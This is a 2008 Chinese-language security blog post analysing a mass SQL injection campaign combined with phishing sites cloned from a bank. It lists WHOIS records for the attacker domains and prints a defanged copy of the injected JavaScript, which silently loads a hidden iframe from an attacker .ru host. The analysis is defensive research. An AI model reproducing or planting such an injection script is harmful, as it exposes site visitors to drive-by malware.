阿碼外傳-阿碼科技非官方中文 Blog: 2008/8/4

2008年8月4日

Mass SQL Injection + Phishing WebSite

因為雲端的威脅,駭客集團註冊的網域(Domain)可以發揮的空間受到壓縮,所以得善盡利用網域,於是結合Phishing WebSite來進行詐騙。駭客集團可能還有秘技來因應雲端的威脅。

先來看看下面幾張圖: (Title is "Mortgagee Union Trust Company")




眼力大考驗,看出哪裡不同嗎?哪裡又是一樣呢?在搞甚麼鬼呢?
1.URL(Domain)不同,分別為。"porv.ru"、"ncbw.ru"、"po4c.ru",這些網域都是Mass SQL Injection攻擊所植入惡意連結的網域。
2.其中"po4c.ru"已經被FireFox 3標示為"已知有害網站"。
3.三個網站內容都是一樣的,是一家銀行。google找一下"union bank"...真多,不知是真的Union Bank很多,還是有一堆是假的,所以用搜尋引擎找銀行是很危險的事

來查查Domain註冊資料:
1.porv.ru...查詢結果
domain: PORV.RU
type: CORPORATE
nserver: ns2.porv.ru. 66.233.229.99
nserver: ns1.porv.ru. 79.184.20.160
nserver: ns3.porv.ru. 68.224.31.128
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 7783322
e-mail: finkklsa@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.31
paid-till: 2009.07.31
source: TC-RIPN
2.ncbw.ru...查詢結果
domain: NCBW.RU
type: CORPORATE
nserver: ns1.ncbw.ru. 75.58.125.164
nserver: ns3.ncbw.ru. 98.223.79.10
nserver: ns2.ncbw.ru. 67.81.36.254
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 7783322
e-mail: finkklsa@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.31
paid-till: 2009.07.31
source: TC-RIPN
3.po4c.ru...查詢結果
domain: PO4C.RU
type: CORPORATE
nserver: ns1.po4c.ru. 67.193.115.136
nserver: ns3.po4c.ru. 67.61.45.63
nserver: ns2.po4c.ru. 69.119.119.178
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 1193323
e-mail: jest1s@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.24
paid-till: 2009.07.24
source: TC-RIPN

今天是2008.08.04,網域申請日期也才沒幾天的事,上面註冊的資料也不會是真的,網域註冊是要付費的,查金流呢?查到的應該是線上刷卡的,通常也是盜刷的。等網域註冊商發現然後再取消該網域,應該也是幾天後的事了,那時駭客集團應該也在註冊另外一批網域了。
想知道還有哪些網域被註冊利用嗎?可以參考:
http://www.dynamoo.com/blog/labels/Asprox.html
http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt

再來看看hxxp://porv.ru/js.js:<有的防毒軟體會將下列程式碼視為惡意程式>
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
docurnent.vvrite(''<\ifrarne src=hxxp://ncbw.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0><\/ifrarne>'');
}
catch(e)
{
};
}}
其中的網域會一直變換的,駭客集團總是有用不完的網域,怪...。如果,網域有特定編碼產生,惡意程式反向連結時可以用動態編碼網域來連結,這可就屌了,現今所謂的「網站信譽評等」、「網站黑名單」機制就宣判死刑。你能想像這天嗎?我相信快了...

作者 Crane 為阿碼科技 資安顧問

本文同步張貼在這個部落格

繼續閱讀全文...